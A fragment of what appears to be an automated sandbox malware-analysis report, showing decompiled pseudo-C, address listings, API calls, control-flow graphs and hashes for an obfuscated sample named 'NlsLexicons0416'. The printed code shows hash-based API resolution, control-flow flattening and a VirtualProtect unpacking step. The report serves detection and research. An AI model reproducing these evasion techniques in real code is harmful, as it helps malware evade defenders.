								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x3ee1cc;
										if(_t95 == 0) {
											_t95 = E003E3E60(_t93, E003E3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x3ee1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x3ee494;
							if(_t62 == 0) {
								_t62 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x3ee494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x3edd18 == 0) {
								 *0x3edd18 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x3ee43c;
								if(_t116 == 0) {
									_t116 = E003E3E60(_t93, E003E3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x3ee43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E003E3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x003e30a2
                                                                                0x003e30a6
                                                                                0x003e30ac
                                                                                0x003e30b1
                                                                                0x003e30b6
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c0
                                                                                0x003e30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e30cb
                                                                                0x003e31f1
                                                                                0x003e32f9
                                                                                0x003e3300
                                                                                0x003e31f7
                                                                                0x003e31f7
                                                                                0x00000000
                                                                                0x003e31f7
                                                                                0x003e30d1
                                                                                0x003e30d6
                                                                                0x003e31e5
                                                                                0x00000000
                                                                                0x003e30dc
                                                                                0x003e30e1
                                                                                0x003e31a0
                                                                                0x003e31a8
                                                                                0x003e31c0
                                                                                0x003e31c2
                                                                                0x003e31c2
                                                                                0x003e31ce
                                                                                0x003e31d0
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30e7
                                                                                0x003e30ec
                                                                                0x00000000
                                                                                0x003e30f2
                                                                                0x003e30f2
                                                                                0x003e310d
                                                                                0x003e3111
                                                                                0x003e311f
                                                                                0x003e3123
                                                                                0x003e3130
                                                                                0x003e3139
                                                                                0x003e3147
                                                                                0x003e314b
                                                                                0x003e3153
                                                                                0x003e315b
                                                                                0x003e3175
                                                                                0x003e317f
                                                                                0x003e3187
                                                                                0x003e318b
                                                                                0x003e3193
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e30ec
                                                                                0x003e30e1
                                                                                0x003e30d6
                                                                                0x00000000
                                                                                0x003e30cb
                                                                                0x003e3206
                                                                                0x003e3245
                                                                                0x003e324c
                                                                                0x003e325f
                                                                                0x003e3264
                                                                                0x003e3264
                                                                                0x003e326b
                                                                                0x003e3274
                                                                                0x003e328c
                                                                                0x003e328c
                                                                                0x003e3299
                                                                                0x003e329b
                                                                                0x003e329f
                                                                                0x00000000
                                                                                0x003e32a1
                                                                                0x003e32a1
                                                                                0x00000000
                                                                                0x003e32a1
                                                                                0x003e3208
                                                                                0x003e320d
                                                                                0x003e32ab
                                                                                0x003e32b3
                                                                                0x003e32cb
                                                                                0x003e32cd
                                                                                0x003e32cd
                                                                                0x003e32e4
                                                                                0x003e32e6
                                                                                0x003e32ed
                                                                                0x003e32f0
                                                                                0x003e32f3
                                                                                0x00000000
                                                                                0x003e3213
                                                                                0x003e3218
                                                                                0x00000000
                                                                                0x003e321a
                                                                                0x003e3221
                                                                                0x003e3223
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x00000000
                                                                                0x003e30ba
                                                                                0x003e30ba
                                                                                0x003e3218
                                                                                0x003e320d
                                                                                0x00000000
                                                                                0x003e322d
                                                                                0x003e322d
                                                                                0x003e3242
                                                                                0x00000000
                                                                                0x003e3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 003E3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                                                • Instruction ID: 9241e975706e61e07d63f286ef6c32bda042b43280528217a9b98689843478f0
                                                                                • Opcode Fuzzy Hash: 8ab4ef9328b250616d71b18c254f70d120545319738c7ee24307e0a2aa8e2096
                                                                                • Instruction Fuzzy Hash: BA51D3717083A58BC719DF6EC48852A7BEAEBD4304F204A1EF451CB391DB31DE498B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 508 3e7080-3e7092 call 3e34c0 511 3e70af-3e70c3 LoadLibraryW 508->511 512 3e7094-3e70aa call 3e3f00 call 3e3e60 508->512 514 3e70c5-3e70db call 3e3f00 call 3e3e60 511->514 515 3e70e0-3e70eb 511->515 512->511 514->515 522 3e70ed-3e7103 call 3e3f00 call 3e3e60 515->522 523 3e7108-3e7110 515->523 522->523
                                                                                C-Code - Quality: 75%
                                                                                			E003E7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E003E34C0(__ecx);
				if( *0x3edd1c == 0) {
					 *0x3edd1c = E003E3E60(__ebx, E003E3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x3ee548; // 0x5e7e38
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x3ee494;
				if(_t7 == 0) {
					_t7 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x3ee494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x3edf30;
				if(_t9 == 0) {
					_t9 = E003E3E60(_t15, E003E3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x3edf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x003e7080
                                                                                0x003e7082
                                                                                0x003e7089
                                                                                0x003e7092
                                                                                0x003e70aa
                                                                                0x003e70aa
                                                                                0x003e70b0
                                                                                0x003e70b2
                                                                                0x003e70b8
                                                                                0x003e70bc
                                                                                0x003e70c3
                                                                                0x003e70d6
                                                                                0x003e70db
                                                                                0x003e70db
                                                                                0x003e70e2
                                                                                0x003e70e4
                                                                                0x003e70eb
                                                                                0x003e70fe
                                                                                0x003e7103
                                                                                0x003e7103
                                                                                0x003e7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,003E721D,003E68AC), ref: 003E70B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: 8~^
                                                                                • API String ID: 1029625771-3897968049
                                                                                • Opcode ID: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                                                • Instruction ID: 457c94b00617875c7316674a6b8ffb5bf94ed0d44c50ee0a3fa9c49e90bc5543
                                                                                • Opcode Fuzzy Hash: 4449bb853b64c0ceeea584fa211025182d9cdbbdb91f0061a87d1818c6ab5cab
                                                                                • Instruction Fuzzy Hash: B801A2317142B54B9B27AF7B9C8472B2AAF9FD0748B100369A015CF3D5EE31DD028B80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E80A0, Relevance: 3.2, APIs: 2, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 531 3e80a0-3e815b 532 3e8163-3e8168 531->532 533 3e8170-3e8175 532->533 534 3e817b 533->534 535 3e8338-3e833d 533->535 536 3e8287-3e829b call 3e34c0 534->536 537 3e8181-3e8186 534->537 538 3e836f-3e8377 535->538 539 3e833f-3e8344 535->539 564 3e829d-3e82b5 call 3e3f00 call 3e3e60 536->564 565 3e82bb-3e82e3 536->565 540 3e818c-3e8191 537->540 541 3e8252-3e8259 537->541 545 3e8379-3e8391 call 3e3f00 call 3e3e60 538->545 546 3e8397-3e83bb CreateFileW 538->546 542 3e8346-3e834b 539->542 543 3e8365-3e836a 539->543 551 3e81e3-3e821a 540->551 552 3e8193-3e8198 540->552 547 3e825b-3e8271 call 3e3f00 call 3e3e60 541->547 548 3e8276-3e8282 541->548 553 3e834d-3e8352 542->553 554 3e83c7-3e83ce 542->554 543->533 545->546 549 3e83ee-3e83fa 546->549 550 3e83bd-3e83c2 546->550 547->548 548->533 550->533 561 3e821c-3e8232 call 3e3f00 call 3e3e60 551->561 562 3e8237-3e824d 551->562 552->553 560 3e819e-3e81e1 call 3eb6e0 552->560 553->533 563 3e8358-3e8364 553->563 558 3e83eb-3e83ec CloseHandle 554->558 559 3e83d0-3e83e6 call 3e3f00 call 3e3e60 554->559 558->549 559->558 560->533 561->562 562->533 564->565 582 3e82e5-3e82fb call 3e3f00 call 3e3e60 565->582 583 3e8300-3e830b 565->583 582->583 595 3e830d-3e8323 call 3e3f00 call 3e3e60 583->595 596 3e8328-3e8333 583->596 595->596 596->532
                                                                                C-Code - Quality: 71%
                                                                                			E003E80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E003E34C0(0x3ed970);
								_t122 =  *0x3ee158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E003E3E60(_t96, E003E3F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x3ee158 = _t122;
								}
								_t101 =  *0x3ee54c; // 0x5ae080
								_t50 = _t101 + 0x260; // 0x5ae2e0
								_t51 = _t101 + 0x18; // 0x5ae098
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x3ee494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E003E3F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E003E3E60(_t96, _t83, 0x7facde30, _t128);
									 *0x3ee494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x3edf30;
								if(_t80 == 0) {
									_t82 = E003E3F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E003E3E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x3edf30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x3ee1d4;
									if(_t86 == 0) {
										_t88 = E003E3F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E003E3E60(_t96, _t88, 0xa229df38, _t128);
										 *0x3ee1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x3edee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E003E3F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E003E3E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x3edee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x3ede04 == 0) {
								_t66 = E003E3F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x3ede04 = E003E3E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x3ede3c == 0) {
										 *0x3ede3c = E003E3E60(_t96, E003E3F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x003e80a0
                                                                                0x003e80a0
                                                                                0x003e80a6
                                                                                0x003e80ae
                                                                                0x003e80b3
                                                                                0x003e80bb
                                                                                0x003e80c3
                                                                                0x003e80ca
                                                                                0x003e80ce
                                                                                0x003e80d2
                                                                                0x003e80d9
                                                                                0x003e80e0
                                                                                0x003e80e7
                                                                                0x003e80ee
                                                                                0x003e80f5
                                                                                0x003e80fc
                                                                                0x003e8103
                                                                                0x003e8112
                                                                                0x003e8116
                                                                                0x003e8119
                                                                                0x003e811d
                                                                                0x003e8125
                                                                                0x003e8133
                                                                                0x003e8137
                                                                                0x003e813f
                                                                                0x003e8147
                                                                                0x003e814f
                                                                                0x003e8153
                                                                                0x003e815b
                                                                                0x003e8163
                                                                                0x003e8163
                                                                                0x003e8168
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8170
                                                                                0x003e8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e817b
                                                                                0x003e828c
                                                                                0x003e8291
                                                                                0x003e8297
                                                                                0x003e829b
                                                                                0x003e82b3
                                                                                0x003e82b5
                                                                                0x003e82b5
                                                                                0x003e82bb
                                                                                0x003e82c1
                                                                                0x003e82c8
                                                                                0x003e82d7
                                                                                0x003e82d9
                                                                                0x003e82de
                                                                                0x003e82e3
                                                                                0x003e82ea
                                                                                0x003e82ef
                                                                                0x003e82f6
                                                                                0x003e82fb
                                                                                0x003e82fb
                                                                                0x003e8302
                                                                                0x003e8304
                                                                                0x003e830b
                                                                                0x003e8312
                                                                                0x003e8317
                                                                                0x003e831e
                                                                                0x003e8323
                                                                                0x003e8323
                                                                                0x003e832c
                                                                                0x003e832e
                                                                                0x00000000
                                                                                0x003e8181
                                                                                0x003e8186
                                                                                0x003e8252
                                                                                0x003e8259
                                                                                0x003e8260
                                                                                0x003e8265
                                                                                0x003e826c
                                                                                0x003e8271
                                                                                0x003e8271
                                                                                0x003e827b
                                                                                0x003e827d
                                                                                0x00000000
                                                                                0x003e818c
                                                                                0x003e8191
                                                                                0x003e81e3
                                                                                0x003e81e7
                                                                                0x003e81eb
                                                                                0x003e81ef
                                                                                0x003e81f3
                                                                                0x003e81f7
                                                                                0x003e81fb
                                                                                0x003e8200
                                                                                0x003e8204
                                                                                0x003e8208
                                                                                0x003e820c
                                                                                0x003e8210
                                                                                0x003e821a
                                                                                0x003e8221
                                                                                0x003e8226
                                                                                0x003e822d
                                                                                0x003e8232
                                                                                0x003e8232
                                                                                0x003e8241
                                                                                0x003e8245
                                                                                0x003e824a
                                                                                0x00000000
                                                                                0x003e8193
                                                                                0x003e8198
                                                                                0x00000000
                                                                                0x003e819e
                                                                                0x003e81a0
                                                                                0x003e81a8
                                                                                0x003e81c4
                                                                                0x003e81c8
                                                                                0x003e81d4
                                                                                0x003e81d8
                                                                                0x003e81dd
                                                                                0x00000000
                                                                                0x003e81dd
                                                                                0x003e8198
                                                                                0x003e8191
                                                                                0x003e8186
                                                                                0x00000000
                                                                                0x003e817b
                                                                                0x003e833d
                                                                                0x003e8377
                                                                                0x003e837e
                                                                                0x003e8383
                                                                                0x003e8391
                                                                                0x003e8391
                                                                                0x003e83b4
                                                                                0x003e83b6
                                                                                0x003e83bb
                                                                                0x00000000
                                                                                0x003e83bd
                                                                                0x003e83bd
                                                                                0x00000000
                                                                                0x003e83bd
                                                                                0x003e833f
                                                                                0x003e8344
                                                                                0x003e8365
                                                                                0x00000000
                                                                                0x003e8346
                                                                                0x003e834b
                                                                                0x003e83ce
                                                                                0x003e83e6
                                                                                0x003e83e6
                                                                                0x003e83ec
                                                                                0x003e83f1
                                                                                0x003e83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e834b
                                                                                0x003e8344
                                                                                0x00000000
                                                                                0x003e834d
                                                                                0x003e834d
                                                                                0x003e8364
                                                                                0x00000000
                                                                                0x003e8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003E83B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 003E83EC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID:
                                                                                • API String ID: 3498533004-0
                                                                                • Opcode ID: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                                                • Instruction ID: 9e072d228de8814512ae206b39ee61960d0d811ecf347f0b3db9b858980e14a7
                                                                                • Opcode Fuzzy Hash: f5b9706bea5c369cdbea5793f4fac8c6caaca2901d062248e970327f764eb35c
                                                                                • Instruction Fuzzy Hash: 1881C070A083958FD71ADF6AC88462BB7E9ABD4744F000A2DF589CB3D0EB74DD018B52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 603 3d0580-3d05be call 3d0ed0 606 3d05c0-3d05cf 603->606 607 3d05d2-3d05da 603->607 608 3d06e7-3d06ef 607->608 609 3d05e0-3d05e3 607->609 609->608 610 3d05e9-3d05eb 609->610 610->608 611 3d05f1-3d05fc 610->611 611->608 613 3d0602-3d0607 611->613 614 3d060d-3d0629 call 3d1140 RtlMoveMemory 613->614 615 3d06d8-3d06e4 613->615 618 3d062b-3d0630 614->618 619 3d0654-3d0659 614->619 620 3d0643-3d0652 618->620 621 3d0632-3d0641 618->621 622 3d066c-3d0678 619->622 623 3d065b-3d066a 619->623 624 3d0679-3d0699 call 3d1140 620->624 621->624 622->624 623->624 624->608 627 3d069b-3d06a3 VirtualProtect 624->627 628 3d06a5-3d06a8 627->628 629 3d06c6-3d06d5 627->629 628->608 630 3d06aa-3d06ad 628->630 630->608 631 3d06af-3d06b1 630->631 631->614 632 3d06b7-3d06c3 631->632
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003D061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 003D069C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: f9ad5730573c1d1c0b8711103ce9c04b600b50c7da62453a5aae67a69162a970
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 2B3156B365420657E3299A79FC85BEBA3C4DBD1B50F08483BF905D2380D52ED468C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 633 3e5ce0-3e5cec call 3e65e0 636 3e5cee-3e5d04 call 3e3f00 call 3e3e60 633->636 637 3e5d09-3e5d0d ExitProcess 633->637 636->637
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E003E65E0();
				if( *0x3eddb8 == 0) {
					 *0x3eddb8 = E003E3E60(_t5, E003E3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x003e5ce0
                                                                                0x003e5cec
                                                                                0x003e5d04
                                                                                0x003e5d04
                                                                                0x003e5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 003E5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                                                • Instruction ID: a208ded121661b617140d396e20823898fbdb6a8be73af8895fea1550c88e28f
                                                                                • Opcode Fuzzy Hash: 32ff31d49a0811fcd3ee33b2e84d899393361ccdd81993fe135021ab8443fd55
                                                                                • Instruction Fuzzy Hash: 29D0C9217442A446DA56ABB65C8A76B269B4FE0748F104219E011CF2D6EE208920A750
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
